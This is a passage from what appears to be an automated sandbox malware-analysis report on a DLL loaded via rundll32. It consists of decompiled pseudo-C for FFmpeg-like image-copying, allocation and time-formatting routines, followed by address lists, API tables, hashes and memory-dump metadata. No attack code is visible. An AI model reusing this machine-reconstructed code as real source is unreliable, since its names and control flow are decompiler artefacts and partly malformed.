															_t344 = _t342 + _t557[0x61] - 1 >> _t439;
															_t557[0xc] = _t344;
															__eflags = _t344;
															if(_t344 > 0) {
																_t413 =  *(_t557 + 0x50 + _t557[0xa] * 4);
																_t347 = _t557[0xf];
																_t557[0xb] = _t413;
																__eflags = _t347 - _t413;
																_t533 =  >  ? _t413 : _t347;
																_t557[0x10] = _t533;
																_t348 = _t347 - _t533;
																__eflags = _t348;
																_t557[0x11] = _t348;
																do {
																	_t534 = _t557[0xb];
																	__eflags = _t534;
																	if(_t534 != 0) {
																		_t350 = _t557[0xe];
																		_t479 =  *_t350 & 0x000000ff;
																		_t440 =  &(_t350[_t534]);
																		while(1) {
																			__eflags =  *_t350 - _t479;
																			if( *_t350 != _t479) {
																				break;
																			}
																			_t350 =  &(_t350[1]);
																			__eflags = _t440 - _t350;
																			if(_t440 == _t350) {
																				L102:
																				_t351 = _t557[0xf];
																				_t502 = _t550;
																				__eflags = _t351 - 8;
																				_t414 = _t351;
																				if(_t351 >= 8) {
																					_t352 = _t479 * 0x1010101;
																					__eflags = _t550 & 0x00000001;
																					if((_t550 & 0x00000001) != 0) {
																						 *_t550 = _t352;
																						_t502 = _t550 + 1;
																						_t414 = _t557[0xf] - 1;
																					}
																					__eflags = _t502 & 0x00000002;
																					if((_t502 & 0x00000002) != 0) {
																						 *_t502 = _t352;
																						_t414 = _t414 - 2;
																						_t502 = _t502 + 2;
																					}
																					__eflags = _t502 & 0x00000004;
																					if((_t502 & 0x00000004) != 0) {
																						 *_t502 = _t352;
																						_t414 = _t414 - 4;
																						_t502 = _t502 + 4;
																					}
																					_t441 = _t414;
																					_t414 = _t414 & 0x00000003;
																					_t442 = _t441 >> 2;
																					memset(_t502, _t352, _t442 << 2);
																					_t557 =  &(_t557[3]);
																					_t502 = _t502 + _t442;
																				}
																				_t413 = _t414 & 0x00000007;
																				__eflags = _t413;
																				if(_t413 != 0) {
																					_t354 = 0;
																					__eflags = 0;
																					do {
																						 *(_t502 + _t354) = _t479;
																						_t354 = _t354 + 1;
																						__eflags = _t354 - _t413;
																					} while (_t354 < _t413);
																				}
																			} else {
																				continue;
																			}
																			goto L99;
																		}
																		__eflags = _t557[0xb] - 1;
																		if(_t557[0xb] == 1) {
																			goto L102;
																		} else {
																			_t355 = _t557[0x10];
																			_t503 = _t550;
																			_t537 = _t557[0xe];
																			__eflags = _t355 - 8;
																			_t444 = _t355;
																			if(_t355 >= 8) {
																				__eflags = _t550 & 0x00000001;
																				if((_t550 & 0x00000001) != 0) {
																					_t356 =  *_t537 & 0x000000ff;
																					_t503 = _t550 + 1;
																					_t537 = _t537 + 1;
																					_t557[0x12] = _t356;
																					 *_t550 = _t356;
																					_t444 = _t557[0x10] - 1;
																				}
																				__eflags = _t503 & 0x00000002;
																				if((_t503 & 0x00000002) != 0) {
																					_t358 =  *_t537 & 0x0000ffff;
																					_t503 = _t503 + 2;
																					_t537 = _t537 + 2;
																					_t444 = _t444 - 2;
																					 *(_t503 - 2) = _t358;
																				}
																				__eflags = _t503 & 0x00000004;
																				if((_t503 & 0x00000004) != 0) {
																					_t364 =  *_t537;
																					_t503 = _t503 + 4;
																					_t537 = _t537 + 4;
																					_t444 = _t444 - 4;
																					 *(_t503 - 4) = _t364;
																				}
																			}
																			memcpy(_t503, _t537, _t444);
																			_t557 =  &(_t557[3]);
																			_t557[2] = _t557[0x11];
																			_t361 = _t557[0x10];
																			_t557[1] = _t361;
																			_t362 = _t361 + _t550;
																			__eflags = _t362;
																			 *_t557 = _t362;
																			L10029830(_t413, _t537 + _t444 + _t444, _t537);
																		}
																	}
																	L99:
																	_t550 = _t550 +  *((intOrPtr*)(_t557[0x5d] + _t557[0xa] * 4));
																	_t267 =  &(_t557[0xc]);
																	 *_t267 = _t557[0xc] - 1;
																	__eflags =  *_t267;
																} while ( *_t267 != 0);
															}
															_t557[0xa] = _t557[0xa] + 1;
															_t557[0xe] = _t557[0xe] + 0x20;
															__eflags = _t557[0xd] - _t557[0xa];
														} while (_t557[0xd] > _t557[0xa]);
														_t332 = 0;
													}
													return _t332;
												} else {
													continue;
												}
												goto L121;
											}
											goto L60;
										} else {
											_t365 =  *(_t545 + 0x14);
											__eflags = _t365;
											_t447 =  >=  ? _t365 : 0;
											__eflags = _t365 - 0x20;
											 *((intOrPtr*)(_t557 + 0x50 +  *(_t545 + 0x10) * 4)) =  >=  ? _t365 : 0;
											if(_t365 > 0x20) {
												goto L60;
											} else {
												__eflags = _t477 - 1;
												if(__eflags == 0) {
													L45:
													_t557[0x5e] = _t409;
													_t557[0xa] = _t545;
													_t367 = _t557[0xa];
													_t557[0xc] = __eflags == 0;
													_t145 = _t545 + 0x10; // 0x10
													_t538 = _t145;
													__eflags = _t557[0x5f] - 2;
													_t557[0xe] = _t367;
													_t507 = 0;
													_t369 = (_t367 & 0xffffff00 | _t557[0x5f] != 0x00000002) & _t557[0xc] & 0x000000ff;
													__eflags = _t369;
													_t557[0xb] = _t369;
													while(1) {
														_t449 = _t538[4];
														asm("cdq");
														_t372 =  *(_t557 + 0x50 +  *_t538 * 4) / _t538[1];
														_t557[0x20] = 0;
														_t557[0x21] = 0;
														__eflags = _t449 - 0x10;
														_t557[0x22] = 0;
														_t557[0x23] = 0;
														if(_t449 > 0x10) {
															goto L60;
														}
														__eflags = _t449 - 7;
														if(_t449 > 7) {
															L49:
															__eflags = _t372;
															if(_t372 <= 0) {
																goto L60;
															} else {
																__eflags = _t507;
																if(_t507 != 0) {
																	L61:
																	_t199 = _t507 - 1; // -1
																	_t417 = 0;
																	__eflags = _t199 - 1;
																	if(_t199 <= 1) {
																		__eflags = _t557[0xe];
																		if(_t557[0xe] == 0) {
																			_t417 = 0x00000080 << _t449 - 0x00000008 & 0x0000ffff;
																		}
																	} else {
																		__eflags = _t507 - 3;
																		if(_t507 == 3) {
																			_t417 = (0x00000001 << _t449) - 0x00000001 & 0x0000ffff;
																		}
																	}
																} else {
																	__eflags = _t557[0xb];
																	if(_t557[0xb] == 0) {
																		goto L61;
																	} else {
																		_t425 = 0x10 << _t449 - 8;
																		__eflags = _t425;
																		_t417 = _t425 & 0x0000ffff;
																	}
																}
																_t552 =  &(_t557[0x24]);
																_t450 = _t552 + _t372 * 2;
																_t484 = _t552;
																do {
																	 *_t484 = _t417;
																	_t484 =  &(_t484[0]);
																	__eflags = _t450 - _t484;
																} while (_t450 != _t484);
																_t418 = _t557[0xa];
																_t538 =  &(_t538[5]);
																_t557[7] = _t372;
																_t557[5] = 0;
																_t557[0x1c] =  &(_t557[0x34]);
																_t557[4] = 0;
																_t557[0x1d] =  &(_t557[0x3c]);
																_t557[2] =  &(_t557[0x20]);
																_t557[0x1e] =  &(_t557[0x44]);
																_t557[6] = _t507;
																_t507 = _t507 + 1;
																_t557[1] =  &(_t557[0x1c]);
																_t557[3] = _t418;
																 *_t557 = _t552;
																_t557[0x1f] =  &(_t557[0x4c]);
																E10034210();
																__eflags = ( *(_t418 + 4) & 0x000000ff) - _t507;
																if(__eflags > 0) {
																	continue;
																} else {
																	_t545 = _t557[0xa];
																	_t409 = _t557[0x5e];
																	goto L57;
																}
															}
														} else {
															__eflags = _t557[0xc];
															if(_t557[0xc] != 0) {
																goto L60;
															} else {
																goto L49;
															}
														}
														goto L121;
													}
													goto L60;
												} else {
													_t453 =  *(_t545 + 0x24);
													_t508 =  *((intOrPtr*)(_t545 + 0x28));
													_t379 =  *((intOrPtr*)(_t557 + 0x50 + _t453 * 4));
													__eflags = _t379 - _t508;
													_t380 =  <  ? _t508 : _t379;
													 *((intOrPtr*)(_t557 + 0x50 + _t453 * 4)) = _t380;
													__eflags = _t380 - 0x20;
													if(_t380 > 0x20) {
														goto L60;
													} else {
														__eflags = _t477 - 2;
														if(__eflags == 0) {
															goto L45;
														} else {
															_t454 =  *(_t545 + 0x38);
															_t509 =  *((intOrPtr*)(_t545 + 0x3c));
															_t381 =  *((intOrPtr*)(_t557 + 0x50 + _t454 * 4));
															__eflags = _t381 - _t509;
															_t382 =  <  ? _t509 : _t381;
															 *((intOrPtr*)(_t557 + 0x50 + _t454 * 4)) = _t382;
															__eflags = _t382 - 0x20;
															if(_t382 > 0x20) {
																goto L60;
															} else {
																__eflags = _t477 - 3;
																if(__eflags == 0) {
																	goto L45;
																} else {
																	_t489 =  *(_t545 + 0x4c);
																	_t455 =  *((intOrPtr*)(_t545 + 0x50));
																	_t383 =  *((intOrPtr*)(_t557 + 0x50 + _t489 * 4));
																	__eflags = _t383 - _t455;
																	_t384 =  <  ? _t455 : _t383;
																	 *((intOrPtr*)(_t557 + 0x50 + _t489 * 4)) = _t384;
																	__eflags = _t384 - 0x20;
																	if(__eflags > 0) {
																		goto L60;
																	} else {
																		goto L45;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t456 = 0;
						_t555[0x22] = _t519;
						_t539 = 0xffffffff;
						_t555[0x13] = _t543;
						_t555[0xe] = _t555[0x23];
						_t386 = 1;
						_t555[0x11] =  ~(_t555[0x27]);
						while(1) {
							_t388 = _t386 + _t555[0x26] - 1 >> _t456;
							_t429 = _t555[0x22][4 + _t539 * 4];
							_t555[0xc] = _t388;
							if(_t388 <= 0) {
								goto L18;
							}
							_t553 =  *(_t555 + 0x54 + _t539 * 4);
							_t555[0x10] = _t539;
							_t555[0xb] = 0;
							_t398 = _t555[0x20];
							_t555[0xd] = _t555[0x11] & _t553 + _t555[0x27] - 0x00000001;
							do {
								_t458 = _t553;
								_t514 = _t398;
								_t541 = _t429;
								if(_t553 >= 8) {
									if((_t398 & 0x00000001) != 0) {
										_t514 = _t398 + 1;
										_t541 = _t429 + 1;
										 *_t398 =  *_t429 & 0x000000ff;
										_t458 = _t553 - 1;
									}
									if((_t514 & 0x00000002) != 0) {
										_t494 =  *_t541 & 0x0000ffff;
										_t514 = _t514 + 2;
										_t541 = _t541 + 2;
										_t458 = _t458 - 2;
										 *(_t514 - 2) = _t494;
									}
									if((_t514 & 0x00000004) != 0) {
										_t495 =  *_t541;
										_t514 = _t514 + 4;
										_t541 = _t541 + 4;
										_t458 = _t458 - 4;
										 *(_t514 - 4) = _t495;
									}
								}
								_t399 = memcpy(_t514, _t541, _t458);
								_t555 =  &(_t555[3]);
								_t555[0xb] =  &(_t555[0xb][1]);
								_t517 = _t555[0xd];
								_t398 = _t399 + _t517;
								_t429 = _t429 +  *(_t555[0xe]);
							} while (_t555[0xc] != _t555[0xb]);
							_t539 = _t555[0x10];
							_t68 =  &(_t555[0x20]);
							 *_t68 = _t555[0x20] + _t555[0xc] * _t517;
							__eflags =  *_t68;
							L18:
							_t539 = _t539 + 1;
							__eflags = _t555[0xf] - _t539;
							if(_t555[0xf] != _t539) {
								__eflags = _t539 - 1;
								if(_t539 <= 1) {
									_t456 = _t555[0x12][6] & 0x000000ff;
									_t386 = 1 << _t456;
								} else {
									_t386 = 1;
									_t456 = 0;
									__eflags = 0;
								}
								_t555[0xe] =  &(_t555[0xe][4]);
								continue;
							}
							_t389 = _t555[0x12];
							_t544 = _t555[0x13];
							_t540 = _t555[0x22];
							__eflags = _t389[8] & 0x00000002;
							if((_t389[8] & 0x00000002) != 0) {
								_t457 = _t555[0x20];
								_t393 = 0;
								__eflags = 0;
								do {
									 *((intOrPtr*)(_t457 + _t393)) =  *((intOrPtr*)(_t540[4] + _t393));
									_t393 = _t393 + 4;
									__eflags = _t393 - 0x400;
								} while (_t393 != 0x400);
							}
							L28:
							return _t544;
							goto L121;
						}
					}
				}
				L121:
			}

0x1002334c
0x10023354
0x1002335e
0x10023365
0x1002336c
0x10023377
0x1002337a
0x10023385
0x10023389
0x1002338e
0x10023391
0x10023393
0x100233a2
0x100233a6
0x100233af
0x100235d8
0x00000000
0x100233bd
0x100233bd
0x100233c3
0x100235cd
0x100235cf
0x100233c9
0x100233d0
0x100233d6
0x100233da
0x100233dc
0x100233de
0x100233e9
0x100233f1
0x100233f5
0x100233fc
0x10023402
0x10023406
0x10023408
0x1002340a
0x1002340d
0x1002340f
0x10023412
0x10023412
0x10023408
0x100233f5
0x100233dc
0x10023416
0x10023421
0x10023429
0x10023433
0x100235df
0x100235e9
0x100235ed
0x100235f0
0x100235f8
0x10023600
0x10023608
0x1002360d
0x10023620
0x10023621
0x10023624
0x1002362a
0x10023631
0x10023634
0x10023639
0x1002363c
0x10023645
0x10023649
0x10023649
0x1002364b
0x1002364b
0x10023652
0x10023659
0x1002365c
0x1002365c
0x10023667
0x1002366f
0x10023677
0x1002367d
0x10023683
0x1002368b
0x1002368f
0x10023693
0x10023698
0x1002369b
0x100238d1
0x100238e0
0x100236a1
0x100236a1
0x100236a3
0x00000000
0x100236a9
0x100236a9
0x100236b0
0x100236b3
0x100236b3
0x100236b5
0x00000000
0x100236bb
0x100236c3
0x100236c9
0x100236cc
0x10023930
0x1002393c
0x10023940
0x10023949
0x1002394b
0x1002394e
0x10023951
0x10023954
0x1002395c
0x1002395f
0x10023964
0x00000000
0x10023979
0x10023979
0x1002397b
0x00000000
0x10023981
0x10023988
0x1002398a
0x1002399a
0x1002399c
0x1002399e
0x100239a3
0x100239a3
0x100239b0
0x100239b0
0x100239b3
0x100239b5
0x100239b7
0x100239f0
0x100239f6
0x10023a14
0x10023a16
0x10023a19
0x10023a19
0x10023a19
0x100239f8
0x100239fe
0x10023a28
0x10023a2b
0x10023a2e
0x10023a2e
0x10023a00
0x10023a06
0x10023a1e
0x10023a20
0x10023a23
0x10023a23
0x10023a08
0x10023a0a
0x10023a0d
0x10023a10
0x10023a10
0x10023a10
0x10023a10
0x100239b9
0x100239b9
0x100239bc
0x100239be
0x100239be
0x100239c0
0x100239c0
0x100239c3
0x100239c4
0x100239c4
0x100239c0
0x100239d1
0x100239d3
0x100239d3
0x100239d3
0x100239d3
0x100239b0
0x1002399e
0x00000000
0x1002398a
0x1002397b
0x100236d2
0x100236d2
0x100236d6
0x100236d8
0x10023898
0x10023898
0x1002389e
0x100238a5
0x100238a7
0x100238b9
0x100238b9
0x100238bd
0x100238c1
0x100238c4
0x100238c9
0x100238cd
0x100238cf
0x00000000
0x00000000
0x100238b0
0x100238b1
0x100238b3
0x10023a3a
0x10023a3e
0x10023a40
0x100239dc
0x100239dc
0x100239dc
0x10023a42
0x10023a42
0x10023a4d
0x10023a4f
0x10023a53
0x10023a57
0x10023a57
0x10023a5f
0x10023a6a
0x10023a6e
0x10023a71
0x10023bcb
0x10023bd4
0x10023a77
0x10023a77
0x10023a7c
0x10023a7c
0x10023a7c
0x10023a89
0x10023a8b
0x10023a8f
0x10023a91
0x10023a9b
0x10023a9f
0x10023aa3
0x10023aa7
0x10023aab
0x10023aae
0x10023ab2
0x10023ab2
0x10023ab4
0x10023ac0
0x10023ac0
0x10023ac4
0x10023ac6
0x10023ac8
0x10023acc
0x10023acf
0x10023add
0x10023add
0x10023adf
0x00000000
0x00000000
0x10023ad8
0x10023ad9
0x10023adb
0x10023b50
0x10023b50
0x10023b54
0x10023b56
0x10023b59
0x10023b5b
0x10023b6e
0x10023b74
0x10023b7a
0x10023bf0
0x10023bf3
0x10023bfa
0x10023bfa
0x10023b7c
0x10023b82
0x10023be5
0x10023be8
0x10023beb
0x10023beb
0x10023b84
0x10023b8a
0x10023bdb
0x10023bdd
0x10023be0
0x10023be0
0x10023b8c
0x10023b8e
0x10023b91
0x10023b94
0x10023b94
0x10023b94
0x10023b94
0x10023b5d
0x10023b5d
0x10023b60
0x10023b62
0x10023b62
0x10023b64
0x10023b64
0x10023b67
0x10023b68
0x10023b68
0x10023b6c
0x00000000
0x00000000
0x00000000
0x00000000
0x10023adb
0x10023ae1
0x10023ae6
0x00000000
0x10023ae8
0x10023ae8
0x10023aec
0x10023aee
0x10023af2
0x10023af5
0x10023af7
0x10023b98
0x10023b9e
0x10023c14
0x10023c17
0x10023c1a
0x10023c1b
0x10023c1f
0x10023c26
0x10023c26
0x10023ba0
0x10023ba6
0x10023c02
0x10023c05
0x10023c08
0x10023c0b
0x10023c0e
0x10023c0e
0x10023ba8
0x10023bae
0x10023bb4
0x10023bb6
0x10023bb9
0x10023bbc
0x10023bbf
0x10023bbf
0x10023bae
0x10023afd
0x10023afd
0x10023b03
0x10023b07
0x10023b0b
0x10023b0f
0x10023b0f
0x10023b11
0x10023b14
0x10023b14
0x10023ae6
0x10023b19
0x10023b27
0x10023b29
0x10023b29
0x10023b29
0x10023b29
0x10023ac0
0x10023b2f
0x10023b33
0x10023b3c
0x10023b3c
0x10023b46
0x10023b46
0x100239e8
0x00000000
0x00000000
0x00000000
0x00000000
0x100238b3
0x00000000
0x100236de
0x100236de
0x100236e6
0x100236e8
0x100236eb
0x100236ee
0x100236f2
0x00000000
0x100236f8
0x100236f8
0x100236fb
0x1002375b
0x1002375b
0x10023766
0x1002376a
0x1002376c
0x10023776
0x10023776
0x10023779
0x10023781
0x10023788
0x1002378a
0x1002378a
0x1002378c
0x10023790
0x10023796
0x1002379d
0x1002379e
0x100237a3
0x100237ac
0x100237b3
0x100237b6
0x100237bd
0x100237c4
0x00000000
0x00000000
0x100237ca
0x100237cd
0x100237da
0x100237da
0x100237dc
0x00000000
0x100237e2
0x100237e2
0x100237e4
0x100238e8
0x100238e8
0x100238eb
0x100238ed
0x100238f0
0x10023914
0x10023916
0x10023926
0x10023926
0x100238f2
0x100238f2
0x100238f5
0x10023903
0x10023903
0x100238f5
0x100237ea
0x100237ea
0x100237f0
0x00000000
0x100237f6
0x100237fe
0x100237fe
0x10023800
0x10023800
0x100237f0
0x10023803
0x1002380a
0x1002380e
0x10023810
0x10023810
0x10023813
0x10023816
0x10023816
0x1002381a
0x10023825
0x10023828
0x1002382e
0x10023834
0x1002383f
0x1002384a
0x10023855
0x1002385d
0x10023868
0x1002386c
0x1002386d
0x10023871
0x10023875
0x10023878
0x1002387c
0x10023885
0x10023887
0x00000000
0x1002388d
0x1002388d
0x10023891
0x00000000
0x10023891
0x10023887
0x100237cf
0x100237cf
0x100237d4
0x00000000
0x00000000
0x00000000
0x00000000
0x100237d4
0x00000000
0x100237cd
0x00000000
0x100236fd
0x100236fd
0x10023700
0x10023703
0x10023707
0x10023709
0x1002370c
0x10023710
0x10023713
0x00000000
0x10023719
0x10023719
0x1002371c
0x00000000
0x1002371e
0x1002371e
0x10023721
0x10023724
0x10023728
0x1002372a
0x1002372d
0x10023731
0x10023734
0x00000000
0x1002373a
0x1002373a
0x1002373d
0x00000000
0x1002373f
0x1002373f
0x10023742
0x10023745
0x10023749
0x1002374b
0x1002374e
0x10023752
0x10023755
0x00000000
0x00000000
0x00000000
0x00000000
0x10023755
0x1002373d
0x10023734
0x1002371c
0x10023713
0x100236fb
0x100236f2
0x100236d8
0x100236cc
0x100236b5
0x100236a3
0x10023439
0x10023445
0x10023447
0x10023455
0x10023457
0x1002345d
0x10023461
0x10023466
0x1002346a
0x1002347c
0x1002347e
0x10023482
0x10023488
0x00000000
0x00000000
0x1002348e
0x10023494
0x1002349f
0x100234ad
0x100234b4
0x100234de
0x100234e1
0x100234e3
0x100234e5
0x100234e7
0x100234eb
0x1002355b
0x1002355e
0x10023561
0x10023563
0x10023563
0x100234f3
0x10023540
0x10023543
0x10023546
0x10023549
0x1002354c
0x1002354c
0x100234fb
0x100234fd
0x100234ff
0x10023502
0x10023505
0x10023508
0x10023508
0x100234fb
0x100234c0
0x100234c0
0x100234c6
0x100234ca
0x100234d4
0x100234d6
0x100234d8
0x10023514
0x1002351b
0x1002351b
0x1002351b
0x10023522
0x10023522
0x10023523
0x10023527
0x10023529
0x1002352c
0x10023574
0x1002357d
0x1002352e
0x1002352e
0x10023533
0x10023533
0x10023533
0x10023535
0x00000000
0x10023535
0x10023588
0x1002358c
0x10023590
0x1002359d
0x100235a0
0x100235a2
0x100235a9
0x100235a9
0x100235b0
0x100235b6
0x100235b9
0x100235bc
0x100235bc
0x100235b0
0x100235c3
0x100235cc
0x00000000
0x100235cc
0x1002346a
0x10023433
0x00000000

APIs

mv_image_get_buffer_size.F072 ref: 10023389

Part of subcall function 10023180: mv_pix_fmt_desc_get.F072 ref: 1002319F
Part of subcall function 10023180: mv_image_get_linesize.F072 ref: 100231D4
Part of subcall function 10023180: mv_image_fill_linesizes.F072(?), ref: 10023268
Part of subcall function 10023180: mv_image_fill_plane_sizes.F072(?), ref: 100232CB

mv_pix_fmt_desc_get.F072 ref: 10023393
mv_image_fill_linesizes.F072 ref: 1002342C
mv_log.F072 ref: 10023608
abort.MSVCRT ref: 1002360D
mv_pix_fmt_desc_get.F072 ref: 10023634
mv_pix_fmt_count_planes.F072 ref: 1002363E

Strings

, xrefs: 10023B33
Assertion %s failed at %s:%d, xrefs: 10023600

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizes$abortmv_image_fill_plane_sizesmv_image_get_buffer_sizemv_image_get_linesizemv_logmv_pix_fmt_count_planes
String ID: $Assertion %s failed at %s:%d
API String ID: 1281078460-3513380740
Opcode ID: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
Instruction ID: fcb8fd15439f2f483d5b17ebb944bfddaf5bb174ad0b20b3751318ef1a6b0b23
Opcode Fuzzy Hash: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
Instruction Fuzzy Hash: 1F429A71A083958FC761CF28E48065EBBE1FFC8354F96892EE98997310E771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10013100 Relevance: 22.6, APIs: 15, Instructions: 142COMMON

Download Yara Rule

APIs

mv_mallocz.F072 ref: 10013116
mv_mallocz.F072 ref: 10013128
mv_mallocz.F072 ref: 10013154
mv_mallocz.F072 ref: 100131C3
mv_calloc.F072 ref: 100132A0

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_calloc
String ID:
API String ID: 1417229449-0
Opcode ID: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
Instruction ID: 852a126e1f502dc2a5b99aeb69476376aef21eb3025c4fc6af9fe8b8a21a2e70
Opcode Fuzzy Hash: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
Instruction Fuzzy Hash: CE51D374605B069FC750EFA9D480A1AF7F0FF44780F42892CE9998B601DB74F890CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10013480 Relevance: 9.3, APIs: 6, Instructions: 286COMMON

Download Yara Rule

APIs

mv_encryption_init_info_alloc.F072 ref: 10013562

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_encryption_init_info_alloc
String ID:
API String ID: 3189372936-0
Opcode ID: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
Instruction ID: 5f2a4f4094cb7a0488fc386a39adfcdd6b5e851adb51ea05a95b9a0d2f55e3bd
Opcode Fuzzy Hash: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
Instruction Fuzzy Hash: 44B156B1A083418FC764CF29C58461AFBE2FFC8250F56896DE9899B350E631E981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0AB Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 269stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1002B231

Strings

%lld:%02d:%02d.%06d, xrefs: 1002B386
INT64_MIN, xrefs: 1002B3E6
%d:%02d.%06d, xrefs: 1002B220
INT64_MAX, xrefs: 1002B3A6
%d.%06d, xrefs: 1002B413

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen
String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
API String ID: 39653677-2240581584
Opcode ID: d9608e42abe6f68613390a3061969c563b3d08aa44462ff096801f93028f109c
Instruction ID: 07d1e632b1a5896a253b897e2ae9080e0d7925084183cb4b5c2e4862e9002f9c
Opcode Fuzzy Hash: d9608e42abe6f68613390a3061969c563b3d08aa44462ff096801f93028f109c
Instruction Fuzzy Hash: 82A16C72A187118FC708CF6DD44061EFBE6EBC8750F598A2EF898D7364D674E9058B82

Uniqueness

Uniqueness Score: -1.00%

Function 10007270 Relevance: 6.3, APIs: 4, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
Instruction ID: 80344777319d5c39256bea2cca684abcfe3cba157365ca00e8d05506c74a31d6
Opcode Fuzzy Hash: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
Instruction Fuzzy Hash: 54C19E71A087858FD354CF2D888064EBBE1FFC9294F198A2EF8D8C7355E675D9448B42

Uniqueness

Uniqueness Score: -1.00%

